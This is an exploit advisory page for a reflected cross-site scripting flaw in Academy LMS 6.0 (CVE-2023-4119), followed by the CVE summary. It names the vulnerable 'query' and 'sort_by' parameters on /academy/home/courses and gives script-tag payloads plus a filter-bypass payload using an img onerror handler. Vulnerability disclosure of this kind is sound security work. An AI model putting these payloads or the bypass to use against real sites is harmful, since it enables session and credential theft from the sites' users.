Headline
Academy LMS 6.0 Cross Site Scripting
Academy LMS version 6.0 suffers from a cross site scripting vulnerability.
# Exploit Title: Academy LMS 6.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site # CVE: CVE-2023-4119## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /academy/home/coursesGET parameter 'query' is vulnerable to XSShttps://website/academy/home/courses?query=[XSS]Path: /academy/home/coursesGET parameter 'sort_by' is vulnerable to XSShttps://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]XSS Payloads (Blocked) :<script>alert(1)</script>ldt4d"><ScRiPt>alert(1)</ScRiPt>nuyddXSS Payload Bypass Filter : cplvz"><img src=a onerror=alert(1)>fk4ap[-] Done
Related news
CVE-2023-4119
A vulnerability has been found in Academy LMS 6.0 and classified as problematic. This vulnerability affects unknown code of the file /academy/home/courses. The manipulation of the argument query/sort_by leads to cross site scripting. The attack can be initiated remotely. VDB-235966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.